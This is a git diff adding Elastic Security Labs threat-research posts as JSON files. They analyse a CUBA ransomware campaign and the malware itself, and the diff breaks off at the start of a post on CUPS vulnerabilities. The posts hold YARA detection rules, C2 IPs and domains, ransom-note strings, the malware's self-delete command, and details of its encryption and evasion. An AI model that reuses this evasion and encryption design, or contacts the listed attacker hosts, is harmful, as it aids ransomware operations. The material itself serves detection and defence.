module](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/#:~:text=SYSTEM%0Ameterpreter%20%3E-,hashdump,-The%20hashdump%20post). As previously, this was observed in the Target.process.Ext.memory_region.strings fields.\n\n\n\n### Mimikatz\n\nSimilarly to the Meterpreter tool markings, we also observed [Mimikatz](https://attack.mitre.org/software/S0002/). Mimikatz is an offensive security tool used to collect and inject passwords from compromised systems. It uses the [SEKURLSA::LogonPasswords](https://adsecurity.org/?page_id=1821#SEKURLSALogonPasswords) module to list all available provider credentials, and this was observed in the Target.process.Ext.memory_region.strings fields.\n\n\n\n### Zerologon Exploit\n\nNext the threat actors attempted to use a file called zero.exe, which is used to exploit the [Zerologon vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-1472) to escalate privileges. This file is referenced in [previous reporting](https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/) and is executed on a vulnerable domain controller to dump the NTLM hash for the Administrator. This is a common tactic for lateral movement and to deploy additional implants into the environment, such as Cobalt Strike.\n\n### PsExec\n\n[PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) is a legitimate utility, part of the SysInternals suite of tools, used to interactively launch processes on remote systems. PsExec is a common tool for remote administration, both benign and malicious.\n\nWhile we cannot validate how specifically PsExec was used because there was not an SMB parser on the infected hosts, we can see that PsExec was used to move files between the infected hosts. We cannot confirm that this was not normal administration by the local IT staff, but the only activity observed was between infected hosts and was within the time window of other confirmed malicious activity.\n\n\n\n### Using LOLBAS\n\n[Living off the land binaries, scripts, and libraries (LOLBAS)](https://lolbas-project.github.io/#) is a commonly leveraged method to use native and benign tools for malicious purposes. This reduces attacker tools that need to be moved into the environment as well as to appear more like legitimate processes running in a targeted environment.\n\nIn one intrusion we observed PsExec being used to remotely copy files (see the PsExec section), however in another environment, we observed similar activity to move files using cmd.exe to move files from one host to another. We were unable to collect the files that were being moved for analysis, but they were a DLL and a Batch file named d478.dll and d478.bat, and the atomic indicators are stored in the Observations table.\n\n\n\n## Data Exfiltration\n\nThe CUBA group belongs to a variant of ransomware operators in that they use extortion as a mechanism to coerce payments from their victims.\n\nIn these situations, once initial access and a foothold is achieved, threat actors will identify potentially sensitive data and exfiltrate it off of the environment to use for threats of “name and shame”.\n\nThe CUBA group runs a website on the dark web where they release data from victims that do not pay. CUBA releases some data for free, and for others that are more lucrative, have a payment option.\n\n\n\n\n\n\n\nThere are multiple ways that the victim data could have been exfiltrated for extortion, the presence of BUGHATCH, Meterpreter, and Cobalt Strike all have data movement capabilities.\n\n## Defense Evasion and Actions on the Objective\n\n### DefenderControl.exe\n\nTo prevent the detection of their malware, the threat actors used [Defender Control](https://www.sordum.org/9480/defender-control-v2-1/) as a way to disable Microsoft Defender, the native antivirus built into all Windows systems since Vista.\n\nTo ensure that Defender Control continued to run, the threat actor used svchost.exe to create a scheduled task.\n\n\n\n### CUBA Ransomware\n\nWe detail the observed execution chain and indicators above, but please see Elastic MARE’s detailed reverse engineering of this sample [here](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis).\n\n\n\n## Diamond Model\n\nElastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a, although cluttered, single diamond.\n\n\n\n## Observed Adversary Tactics and Techniques\n\n### Tactics\n\nUsing the MITRE ATT&CK® framework, tactics represent the why of a technique or sub technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n- Initial access\n- Persistence\n- Privilege escalation\n- Defense evasion\n- Credential access\n- Discovery\n- Lateral movement\n- Command & Control\n- Exfiltration\n- Impact\n\nIt should be noted that we did not observe the Collection tactic, but based on the evidence of Exfiltration and Impact, this would have been completed.\n\n### Techniques / Sub Techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\nAs noted throughout this research, this covered multiple victims over a large period of time. The CUBA intrusion set has been reported using different techniques and sub techniques, but these are our specific observations.\n\nObserved techniques/sub techniques.\n\n- Exploit Public-Facing Application\n- Command and Scripting Interpreter - PowerShell, Windows Command Shell\n- Scheduled Task/Job - Scheduled Task\n- Boot or Logon Autostart Execution - Registry Run Keys/Startup Folder\n- Create Account - Local Account\n- OS Credential Dumping - LSA Secrets\n- Data Encrypted for Impact\n- Hide Artifact - Hidden Window\n- Masquerading - Match Legitimate Name or Location\n- Obfuscated Files or Information\n- Reflective Code Loading\n\n## Detection\n\n### YARA\n\nElastic Security has created YARA rules to identify this BUGHATCH and CUBA ransomware activity.\n\n```\nrule Windows_Trojan_Bughatch {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2022-05-09\"\n last_modified = \"2022-05-09\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"Bughatch\"\n threat_name = \"Windows.Trojan.Bughatch\"\n reference_sample = \"b495456a2239f3ba48e43ef295d6c00066473d6a7991051e1705a48746e8051f\"\n strings:\n $a1 = { 8B 45 ?? 33 D2 B9 A7 00 00 00 F7 F1 85 D2 75 ?? B8 01 00 00 00 EB 33 C0 }\n $a2 = { 8B 45 ?? 0F B7 48 04 81 F9 64 86 00 00 75 3B 8B 55 ?? 0F B7 42 16 25 00 20 00 00 ?? ?? B8 06 00 00 00 EB ?? }\n $b1 = { 69 4D 10 FD 43 03 00 81 C1 C3 9E 26 00 89 4D 10 8B 55 FC 8B 45 F8 0F B7 0C 50 8B 55 10 C1 EA 10 81 E2 FF FF 00 00 33 CA 8B 45 FC 8B 55 F8 66 89 0C 42 }\n $c1 = \"-windowstyle hidden -executionpolicy bypass -file\"\n $c2 = \"C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell.exe\"\n $c3 = \"ReflectiveLoader\"\n $c4 = \"\\\\Sysnative\\\\\"\n $c5 = \"TEMP%u.CMD\"\n $c6 = \"TEMP%u.PS1\"\n $c7 = \"\\\\TEMP%d.%s\"\n $c8 = \"NtSetContextThread\"\n $c9 = \"NtResumeThread\"\n condition:\n ($a1 or $a2 or $b1) or 6 of ($c*)\n}\n\nrule Windows_Ransomware_Cuba {\n meta:\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Ransomware\"\n family = \"Cuba\"\n threat_name = \"Windows.Ransomware.Cuba\"\n Reference_sample =\n\"33352a38454cfc247bc7465bf177f5f97d7fd0bd220103d4422c8ec45b4d3d0e\"\n\n strings:\n $a1 = { 45 EC 8B F9 8B 45 14 89 45 F0 8D 45 E4 50 8D 45 F8 66 0F 13 }\n $a2 = { 8B 06 81 38 46 49 44 45 75 ?? 81 78 04 4C 2E 43 41 74 }\n $b1 = \"We also inform that your databases, ftp server and file server were downloaded by us to our servers.\" ascii fullword\n $b2 = \"Good day. All your files are encrypted. For decryption contact us.\" ascii fullword\n $b3 = \".cuba\" wide fullword\n\n condition:\n any of ($a*) or all of ($b*)\n}\n```\n\n## Defensive Recommendations\n\n- Enable Elastic Security Memory and Ransomware protections\n\n- Review and ensure that you have deployed the latest Microsoft Security Updates\n- Maintain backups of your critical systems to aid in quick recovery\n- Attack surface reduction\n- Network segmentation\n\n## Observations\n\nAtomic indicators observed in our investigation.\n\n|\n| |\n| Indicator | Type | Reference from blog | Note |\n| --- | --- | --- | --- |\n| 43f7d739f00c2fdc67f7ab6b976565a323a181fb6570ac3d261dff197f820165 | SHA-256 | afk.ttf | |\n| 159.203.70[.]39 | ipv4-addr | afk.ttf C2 IP | |\n| 728994be6b928de3d1c7b49ca1c79db8656c1cf4b95a1e508a6be48c6ab407da | SHA-256 | add2.exe | |\n| 208.76.253[.]84 | ipv4-addr | add2.exe C2 IP | |\n| c24d7a93d6a5c33e673e6b0fd171701c4646e67cf2328f41739ef9b50302a02e | SHA-256 | add.dll | |\n| 108.170.31[.]115 | ipv4-addr | add.dll C2 IP | |\n| 62f1fbb6f151bcc67fe68e06031af00bc87ae7e4d9d0a6a60a31d140def09365 | SHA-256 | 94-79.dll | |\n| 5669f6a48dac80717fa5770fa3be6c18022a7633b996ccf0df6b468994085378 | SHA-256 | ra.exe | |\n| 9c71b67411b1432931b4b135dc945f6f7f9da3c295a7449f3ab8dcb56681fa70 | SHA-256 | cps.exe | |\n| e35632770a23d8e006e149b038c2ccf576c2da0998d830bbc7d7614dc5c22db5 | SHA-256 | 14931s.dll | |\n| 38.108.119[.]121 | ipv4-addr | Agent32.bin stage location | |\n| 64.235.39[.]82 | ipv4-addr | Agent32.bin stage location | |\n| 17edf458f7b8baae5ddef725e255d3a7bb6c960830503556f157655308895128 | SHA-256 | Agent32.bin (BUGHATCH) | |\n| 2e6fffad384cd6ce93cc1cde97911063e640c1953dac0507cd5f5b4b3d21bb69 | SHA-256 | Agent32.bin (BUGHATCH) | |\n| 144.172.83[.]13 | ipv4-addr | Agent32.bin C2 IP | |\n| 3a8b7c1fe9bd9451c0a51e4122605efc98e7e4e13ed117139a13e4749e211ed0 | SHA-256 | zero.exe | |\n| cdf2b3fbff2649a119051c63904476e70262bde2f6a9a7da8b7db13cbf257851 | SHA-256 | d478.dll | |\n| 104.217.8[.]100 | ipv4-addr | SystemBC infrastructure | |\n| 193.23.244[.]244 | ipv4-addr | SystemBC Tor directory authority | |\n| 86.59.21[.]38 | ipv4-addr | SystemBC Tor directory authority | |\n| 199.58.81[.]140 | ipv4-addr | SystemBC Tor directory authority | |\n| 204.13.164[.]118 | ipv4-addr | SystemBC Tor directory authority | |\n| 194.109.206[.]212 | ipv4-addr | SystemBC Tor directory authority | |\n| 131.188.40[.]189 | ipv4-addr | SystemBC Tor directory authority | |\n| 154.35.175[.]225 | ipv4-addr | SystemBC Tor directory authority | |\n| 171.25.193[.]9 | ipv4-addr | SystemBC Tor directory authority | |\n| 128.31.0[.]34 | ipv4-addr | SystemBC Tor directory authority | |\n| 128.31.0[.]39 | ipv4-addr | SystemBC Tor directory authority | |\n| bluetechsupply[.]com/components/temp.png | url | Cobalt Strike C2 URL | |\n| bluetechsupply[.]com | domain-name | Cobalt Strike C2 | |\n| 217.79.243[.]148 | ipv4-addr | Cobalt Strike C2 | |\n| mvnetworking[.]com | domain-name | Cobalt Strike C2 | |\n| mvnetworking[.]com/files/dhl.jpg | url | Cobalt Strike C2 URL | |\n| 149.255.35[.]131 | ipv4-addr | Cobalt Strike C2 | |\n| ce3a6224dae98fdaa712cfa6495cb72349f333133dbfb339c9e90699cbe4e8e4 | SHA-256 | defender.exe \\ DefenderControl.exe | |\n| 0f385cc69a93abeaf84994e7887cb173e889d309a515b55b2205805bdfe468a3 | SHA-256 | A.exe \\ (CUBA RANSOMWARE) | |\n| b16e0d27e6fa24d3fe7c9ed9167474fbc1cde13ce047878bbd16548cfdf45be3 | SHA-256 | Anet.exe(CUBA RANSOMWARE) | |\n"
+ },
+ "title": "CUBA Ransomware Campaign Analysis",
+ "slug": "cuba-ransomware-campaign-analysis",
+ "date": "2022-09-08",
+ "description": "Elastic Security observed a ransomware and extortion campaign leveraging a combination of offensive security tools, LOLBAS, and exploits to deliver the CUBA ransomware malware.",
+ "author": [
+ {
+ "slug": "daniel-stepanic"
+ },
+ {
+ "slug": "derek-ditch"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "andrew-pease"
+ }
+ ],
+ "image": "blog-thumb-hard-drives.jpg",
+ "category": [
+ {
+ "slug": "campaigns"
+ }
+ ],
+ "tags": [
+ "ref9019",
+ "cuba",
+ "ransomware"
+ ]
+ },
+ "id": "security_labs_content-cuba_ransomware_campaign_analysis-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cuba_ransomware_malware_analysis-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cuba_ransomware_malware_analysis-md.json
new file mode 100644
index 00000000000..d452a049ab5
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cuba_ransomware_malware_analysis-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"CUBA Ransomware Malware Analysis\"\nslug: \"cuba-ransomware-malware-analysis\"\ndate: \"2023-02-14\"\ndescription: \"Elastic Security has performed a deep technical analysis of the CUBA ransomware family. This includes malware capabilities as well as defensive countermeasures.\"\nauthor:\n - slug: salim-bitam\nimage: \"blog-thumb-coin-stacks.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - ref9019\n - cuba\n - ransomware\n---\n\n## Summary\n\nAs a part of Elastic Security’s ongoing threat detection and monitoring efforts, we have recently observed a ransomware intrusion by the CUBA ransomware threat group, internally tracked as REF9019. This report will detail the inner workings of the ransomware deployed inside the network to encrypt the victim’s files. Cuba ransomware provides the attacker with the flexibility to encrypt both local and network shares files in the enterprise. CUBA uses the ChaCha20 cipher algorithm for symmetric encryption and RSA encryption to protect the ChaCha20 keys. CUBA is multithreaded for faster encryption with resource access synchronization to avoid file corruption.\n\nIn this analysis we will describe the following:\n\n- Operations mode\n- Process and services termination\n- Enumeration of volumes\n- Threading implementation\n- File encryption and algorithms used\n- MITRE Attack mapping\n- YARA rule\n- Indicators of compromise\n\n### Static Analysis\n\n| | |\n| --------------- | ---------------------------------------------------------------- | --- |\n| SHA256 Packed | 0f385cc69a93abeaf84994e7887cb173e889d309a515b55b2205805bdfe468a3 |\n| SHA256 Unpacked | 3654af86dc682e95c811e4fd87ea405b627bca81c656f3a520a4b24bf2de879f |\n| File Size | 135168 bytes |\n| FileType: | Executable |\n| Imphash: | CA5F4AF10ABC885182F3FB9ED425DE65 |\n| Compile Time | Wed Mar 09 22:00:31 2022 | UTC |\n| Entropy | 6.582 |\n\n### Sections\n\n| | | | | | |\n| ------ | -------------- | ------------ | -------- | ------- | -------------------------------- |\n| Name | VirtualAddress | Virtual Size | Raw Size | Entropy | MD5 |\n| .text | 0x00401000 | 0x13B5F | 0x13C00 | 6.608 | 931B22064E9E214BF59A4E07A6CA9109 |\n| .rdata | 0x00415000 | 0xA71C | 0xA800 | 5.855 | F6F97411BCD64126A96B08BA9AE1E775 |\n| .data | 0x00420000 | 0x16B0 | 0xC00 | 3.450 | 03B1B11B4531BB656E43A8B457D4A5F7 |\n| .rsrc | 0x00422000 | 0x1E0 | 0x200 | 4.704 | F754ADBD7F5D6195FD6D527001CAB98C |\n| .reloc | 0x00423000 | 0x1200 | 0x1200 | 6.573 | 08B0994DAECAAAA4173B388A80CC52FE |\n\n> For information on the CUBA ransomware campaign and associated malware analysis, check out our blog posts detailing this:\n>\n> - [CUBA Campaign Analysis](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis)\n> - [BUGHATCH Malware Analysis](https://www.elastic.co/security-labs/bughatch-malware-analysis)\n\n### Imports\n\n```\nGetProcessImageFileNameW\nEnumProcesses\nNetApiBufferFree\nNetShareEnum\nGetIpNetTable\nPathFindFileNameW\nFindFirstFileExW\nFindFirstFileW\nFindNextFileW\nWriteFile\nSetFileAttributesW\nMoveFileExW\nFindFirstVolumeW\nTerminateProcess\nGetEnvironmentStringsW\nOpenProcess\nGetCurrentProcessId\nCreateProcessW\nGetVolumePathNamesForVolumeNameW\nFindNextVolumeW\nGetCurrentThreadId\nRaiseException\nGetModuleHandleExW\nOpenProcessToken\nCryptAcquireContextA\nCryptGenRandom\nCryptReleaseContext\nAdjustTokenPrivileges\nLookupPrivilegeValueA\nControlService\nChangeServiceConfigW\nPathAddBackslashW\nGetCPInfo\nGetOEMCP\nIsValidCodePage\nlstrcpynW\nInterlockedDecrement\nFindClose\nCreateFileW\nSleep\nlstrcatW\nCloseHandle\nCreateThread\nlstrcpyW\nlstrcmpW\nReadFile\nGetFileSizeEx\nEnterCriticalSection\nGetCurrentProcess\nGetModuleFileNameW\nLeaveCriticalSection\nGetCommandLineA\nWaitForSingleObject\nGetLastError\nSetEvent\nGetDiskFreeSpaceExW\nResetEvent\nGetWindowsDirectoryW\nSetFilePointerEx\nExitProcess\nCreateEventA\nlstrcmpiW\nGetTickCount\nDeleteCriticalSection\nQueryPerformanceCounter\nSetStdHandle\nFreeEnvironmentStringsW\nGetCommandLineW\nDecodePointer\nGetStringTypeW\nGetProcessHeap\nFlushFileBuffers\nGetConsoleCP\nHeapSize\nWriteConsoleW\nInitializeCriticalSection\nUnhandledExceptionFilter\nSetUnhandledExceptionFilter\nIsProcessorFeaturePresent\nInitializeCriticalSectionAndSpinCount\nWaitForSingleObjectEx\nCreateEventW\nGetModuleHandleW\nGetProcAddress\nIsDebuggerPresent\nGetStartupInfoW\nGetSystemTimeAsFileTime\nInitializeSListHead\nRtlUnwind\nSetLastError\nEncodePointer\nTlsAlloc\nTlsGetValue\nTlsSetValue\nTlsFree\nFreeLibrary\nLoadLibraryExW\nGetFileType\nGetStdHandle\nMultiByteToWideChar\nWideCharToMultiByte\nGetACP\nHeapFree\nHeapAlloc\nLCMapStringW\nHeapReAlloc\nGetConsoleMode\nCharLowerW\nGetKeyboardLayoutList\nwsprintfW\nCloseServiceHandle\nOpenSCManagerW\nOpenServiceW\nQueryServiceStatusEx\n```\n\n### Strings\n\n```\nGood day. All your files are encrypted. For decryption contact us.\nWrite here waterstatus@cock.li\nreserve admin@encryption-support.com\njabber cuba_support@exploit.im\nWe also inform that your databases, ftp server and file server were downloaded by us to our servers.\nIf we do not receive a message from you within three days, we regard this as a refusal to negotiate.\nCheck our platform: http://cuba4ikm4jakjgmkezytyawtdgr2xymvy6nvzgw5cglswg3si76icnqd.onion/\n* Do not rename encrypted files.\n* Do not try to decrypt your data using third party software,\n it may cause permanent data loss.\n* Do not stop process of encryption, because partial encryption cannot be decrypted.\n!! READ ME !!.txt\n```\n\n## Code Analysis\n\n### Entry Point\n\nThe malware starts by retrieving the active input locale identifier of the victim using the GetKeyboardLayout API. When the Russian language is in the list of supported languages of the machine, the process deletes and terminates itself with a simple command line: c:\\system32\\cmd.exe c/ del PATH_TO_BINARY without encrypting the file system.\n\n\n\n### Command-line Options\n\nThe threat actor included 4 different operations based on the following command-line arguments:\n\n- The network keyword\n- An IP keyword\n- A path keyword\n- The local keyword\n \n\n**Network keyword parameter**\n\nWhen specifying the network keyword, the malware retrieves the Address Resolution Protocol (ARP) table of the machine using the GetIpNetTable Windows API and enumerates the shares of each IP in the ARP table, this information is added to a linked list that will be accessed by the encryption capability, which will be discussed further below in detail.\n\n\n\n**IP keyword parameter**\n\nBy specifying an IP address as the first parameter in the command line the malware proceeds by enumerating and encrypting every share found for the specified IP.\n\n**Path keyword parameter**\n\nThe malware will encrypt the local directory contents, or the file provided, as the first parameter of the command-line.\n\n**Local keyword parameter**\n\nThe local keyword is used to encrypt every local volume on the machine, and because the malware targets volumes by their ID, it can encrypt both mounted and unmounted volumes.\n\n### Process Termination\n\nCUBA starts by acquiring SeDebugPrivilege and then terminates a hardcoded list of processes and services using a common Windows API (see appendix for list [[1](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#list-of-terminated-processes)], [[2](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#list-of-terminated-services)]). For some services, the malware first tries to disable the service– indicated by the second parameter of TerminateProcesses::TerminateServiceByName function. This is mainly done to prevent interference with the encryption process by applications that may lock files from external changes, for example, databases.\n\n\n\n### Local Volume Enumeration\n\nThe malware enumerates all the local volumes and for each volume larger than 1GB it saves the volume’s GUID in a custom linked list. The ransomware utilizes the CriticalSection object to access this linked list for synchronization purposes due to multiple threads accessing the same resource. This helps to avoid two threads encrypting the same file at the same time, a race condition that would corrupt the file.\n\n\n\n\n\n### Multithreaded Encryption Synchronization\n\nAfter preparing a list to encrypt, CUBA ransomware spawns encryption threads with the structure defined below as a parameter. Depending on the command line arguments, the malware starts 4 threads for local encryption or 8 threads for network encryption.\n\n\n\nWhen a thread finishes its task, it will decrement a counter until it reaches 0: lpParameter-\\\\>NumberOfThreadRunning. When the last thread completes, it will alert the program that the task is done with a call to SetEvent API, which will self delete and terminate the malware.\n\n\n\n### Encryption Implementation\n\nThe malware leverages the symmetric encryption algorithm ChaCha20 to encrypt files and the asymmetric encryption algorithm RSA to protect the ChaCha20 Key and Initialization Vector (IV). The author has utilized a customized version of [WolfSSL](https://github.com/wolfSSL/wolfssl), an open source SSL/TLS library, to implement this capability. Other samples (2957226fc315f71dc22f862065fe376efab9c21d61bbc374dde34d47cde85658) implemented a similar function using the [libtomcrypt](https://github.com/libtom/libtomcrypt) library. Other implementations may exist that are not described here.\n\nThe ransomware allocates a large custom structure called block that contains all the required encryption information. It then initializes an RsaKey structure with [wc_InitRsaKey](https://www.wolfssl.com/doxygen/group__RSA.html#ga02c9b34d405c5f1c24956ee84a843ef6) and decodes an embedded 4096 bit RSA public key in [DER](https://wiki.openssl.org/index.php/DER) format using [wc_RsaPublicKeyDecode](https://www.wolfssl.com/doxygen/group__RSA.html#ga2610326206b322f33f59e31a845e24b9) which it saves to block.PubRsaKey.\n\n\n\n### File Enumeration\n\nEach thread takes an entry from the linked list and starts recursively enumerating files starting from the root of the volume. In the case of a specific directory, the same function is called recursively except for specific directories (see [appendix](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#excluded-directories) for list). Otherwise, it will ignore the ransom note file !! READ ME !!.txt and files with specific extensions (see [appendix](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#excluded-file-extensions) for list).\n\n\n\nThe malware uses [wc_RNG_GenerateBlock](https://www.wolfssl.com/doxygen/group__Random.html#ga9a289fb3f58f4a5f7e15c2b5a1b0d7c6) a WolfSSL function, to randomly generate 44 bytes. The first 32 bytes of that are used as the ChaCha20 key and the other 12 bytes are used as the IV, it then calls a function to initiate the ChaCha20 structure block.chacha20_KeyIv that will be later used to encrypt the file content. At this point, the ransomware is ready to start encrypting and writing to the file.\n\n\n\nBefore encrypting a file, Cuba ransomware prepends a 1024 byte header, the first 256 bytes are the string FIDEL.CA and some DWORD bytes values, the next 512 bytes are the encrypted ChaCha20 KEY/IV with the public RSA key and the rest is padded with 0.\n\n\n\nBefore starting the encryption, the malware double checks if the file was already encrypted by comparing the first 8 bytes of the file to the header string FIDEL.CA. If equal, the malware terminates the encryption process as described below.\n\n\n\nThen CUBA writes the 1024 byte header and if the file is larger than 2 MB it reads 1 MB of data at a time from the file and encrypts it with the ChaCha20 cipher. Otherwise, it will read and encrypt the entire contents at once.\n\n\n\nThe malware encrypts the file in 1 MB chunks and, depending on the file’s size, it will skip a preset number of bytes. This is done primarily to speed up the encryption process of large files, below is a table to illustrate.\n\n| | | |\n| ---------------- | -------------------- | ------------ |\n| File Size | Chunk Size | Skipped Size |\n| Less than 2 MB | All the file content | 0 MB |\n| Less than 10 MB | 1MB | 4 MB |\n| Less than 50 MB | 1MB | 8 MB |\n| Less than 200 MB | 1MB | 16 MB |\n| Less than 10 GB | 1MB | 200 MB |\n| More than 10 GB | 1MB | 500 MB |\n\nFinally, it will rename the file by adding the extension .cuba.\n\n\n\n\n\n## MITRE ATT&CK Techniques\n\nUsing the MITRE ATT&CK® framework, techniques and sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486/)\n- [Network Share Discovery](https://attack.mitre.org/techniques/T1135/)\n- [Process Discovery](https://attack.mitre.org/techniques/T1057/)\n- [Service Stop](https://attack.mitre.org/techniques/T1489/)\n- [System Information Discovery](https://attack.mitre.org/techniques/T1082/)\n- [Indicator Removal on Host: File Deletion](https://attack.mitre.org/techniques/T1070/004/)\n- [Obfuscated Files or Information: Software Packing](https://attack.mitre.org/techniques/T1027/002/)\n- [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016/)\n- [System Location Discovery: System Language Discovery](https://attack.mitre.org/techniques/T1614/001/)\n- [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486/)\n- [Access Token Manipulation](https://attack.mitre.org/techniques/T1134/)\n\n## Appendix\n\n### List of Terminated Processes\n\n- sqlagent.exe\n- sqlservr.exe\n- sqlwriter.exe\n- sqlceip.exe\n- msdtc.exe\n- sqlbrowser.exe\n- vmwp.exe\n- vmsp.exe\n- outlook.exe\n- Microsoft.Exchange.Store.Worker.exe\n\n### List of Terminated Services\n\n- MySQL\n- MySQL80\n- SQLSERVERAGENT\n- MSSQLSERVER\n- SQLWriter\n- SQLTELEMETRY\n- MSDTC\n- SQLBrowser\n- vmcompute\n- vmms\n- MSExchangeUMCR\n- MSExchangeUM\n- MSExchangeTransportLogSearch\n- MSExchangeTransport\n- MSExchangeThrottling\n- MSExchangeSubmission\n- MSExchangeServiceHost\n- MSExchangeRPC\n- MSExchangeRepl\n- MSExchangePOP3BE\n- MSExchangePop3\n- MSExchangeNotificationsBroker\n- MSExchangeMailboxReplication\n- MSExchangeMailboxAssistants\n- MSExchangeIS\n- MSExchangeIMAP4BE\n- MSExchangeImap4\n- MSExchangeHMRecovery\n- MSExchangeHM\n- MSExchangeFrontEndTransport\n- MSExchangeFastSearch\n- MSExchangeEdgeSync\n- MSExchangeDiagnostics\n- MSExchangeDelivery\n- MSExchangeDagMgmt\n- MSExchangeCompliance\n- MSExchangeAntispamUpdate\n\n### Excluded Directories\n\n- \\windows\\\n- \\program files\\microsoft office\\\n- \\program files (x86)\\microsoft office\\\n- \\program files\\avs\\\n- \\program files (x86)\\avs\\\n- \\$recycle.bin\\\n- \\boot\\\n- \\recovery\\\n- \\system volume information\\\n- \\msocache\\\n- \\users\\all users\\\n- \\users\\default user\\\n- \\users\\default\\\n- \\temp\\\n- \\inetcache\\\n- \\google\\\n\n### Excluded File Extensions\n\n- .exe\n- .dll\n- .sys\n- .ini\n- .lnk\n- .vbm\n- .cuba\n\n## YARA Rule\n\nElastic Security has created YARA rules to identify CUBA ransomware activity.\n\n```\nrule Windows_Ransomware_Cuba {\n meta:\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Ransomware\"\n family = \"Cuba\"\n threat_name = \"Windows.Ransomware.Cuba\"\n Reference_sample = \"33352a38454cfc247bc7465bf177f5f97d7fd0bd220103d4422c8ec45b4d3d0e\"\n\n strings:\n $a1 = { 45 EC 8B F9 8B 45 14 89 45 F0 8D 45 E4 50 8D 45 F8 66 0F 13 }\n $a2 = { 8B 06 81 38 46 49 44 45 75 ?? 81 78 04 4C 2E 43 41 74 }\n $b1 = \"We also inform that your databases, ftp server and file server were downloaded by us to our servers.\" ascii fullword\n $b2 = \"Good day. All your files are encrypted. For decryption contact us.\" ascii fullword\n $b3 = \".cuba\" wide fullword\n\n condition:\n any of ($a*) or all of ($b*)\n}\n```\n\n## Observations\n\nAtomic indicators observed in our investigation.\n\n| | | |\n| ---------------------------------------------------------------- | ------ | --------------- |\n| Indicator | Type | Note |\n| 32beefe2c5e28e87357813c0ef91f47b631a3dff4a6235256aa123fc77564346 | SHA256 | CUBA Ransomware |\n| 0f385cc69a93abeaf84994e7887cb173e889d309a515b55b2205805bdfe468a3 | SHA256 | CUBA Ransomware |\n| bcf0f202db47ca671ed6146040795e3c8315b7fb4f886161c675d4ddf5fdd0c4 | SHA256 | CUBA Ransomware |\n\n## Artifacts\n\nArtifacts are also available for download in both ECS and STIX format in a combined zip bundle.\n"
+ },
+ "title": "CUBA Ransomware Malware Analysis",
+ "slug": "cuba-ransomware-malware-analysis",
+ "date": "2023-02-14",
+ "description": "Elastic Security has performed a deep technical analysis of the CUBA ransomware family. This includes malware capabilities as well as defensive countermeasures.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ }
+ ],
+ "image": "blog-thumb-coin-stacks.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "ref9019",
+ "cuba",
+ "ransomware"
+ ]
+ },
+ "id": "security_labs_content-cuba_ransomware_malware_analysis-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cups_overflow-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cups_overflow-md.json
new file mode 100644
index 00000000000..56db5507a49
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-cups_overflow-md.json
@@ -0,0 +1,46 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Cups Overflow: When your printer spills more than Ink\"\nslug: \"cups-overflow\"\ndate: \"2024-09-28\"\ndescription: \"Elastic Security Labs discusses detection and mitigation strategies for vulnerabilities in the CUPS printing system, which allow unauthenticated attackers to exploit the system via IPP and mDNS, resulting in remote code execution (RCE) on UNIX-based systems such as Linux, macOS, BSDs, ChromeOS, and Solaris.\"\nauthor:\n - slug: mika-ayenson\n - slug: terrance-dejesus\n - slug: eric-forte\n - slug: ruben-groenewoud\nimage: \"cups-overflow.jpg\"\ncategory:\n - slug: security-research\n - slug: vulnerability-updates\ntags:\n - linux\n - macos\n - cups\n - vulnerability\n - CVE-2024-47176\n - CVE-2024-47076\n - CVE-2024-47175\n - CVE-2024-47177\n---\n\n## Update October 2, 2024\n\nThe following packages introduced out-of-the-box (OOTB) rules to detect the exploitation of these vulnerabilities. Please check your \"Prebuilt Security Detection Rules\" integration versions or visit the [Downloadable rule updates](https://www.elastic.co/guide/en/security/current/prebuilt-rules-downloadable-updates.html) site.\n\n- Stack Version 8.15 - Package Version 8.15.6+\n- Stack Version 8.14 - Package Version 8.14.12+\n- Stack Version 8.13 - Package Version 8.13.18+\n- Stack Version 8.12 - Package Version 8.12.23+\n\n## Key takeaways\n\n* On September 26, 2024, security researcher Simone Margaritelli (@evilsocket) disclosed multiple vulnerabilities affecting the `cups-browsed`, `libscupsfilters`, and `libppd` components of the CUPS printing system, impacting versions \\<= 2.0.1.\n* The 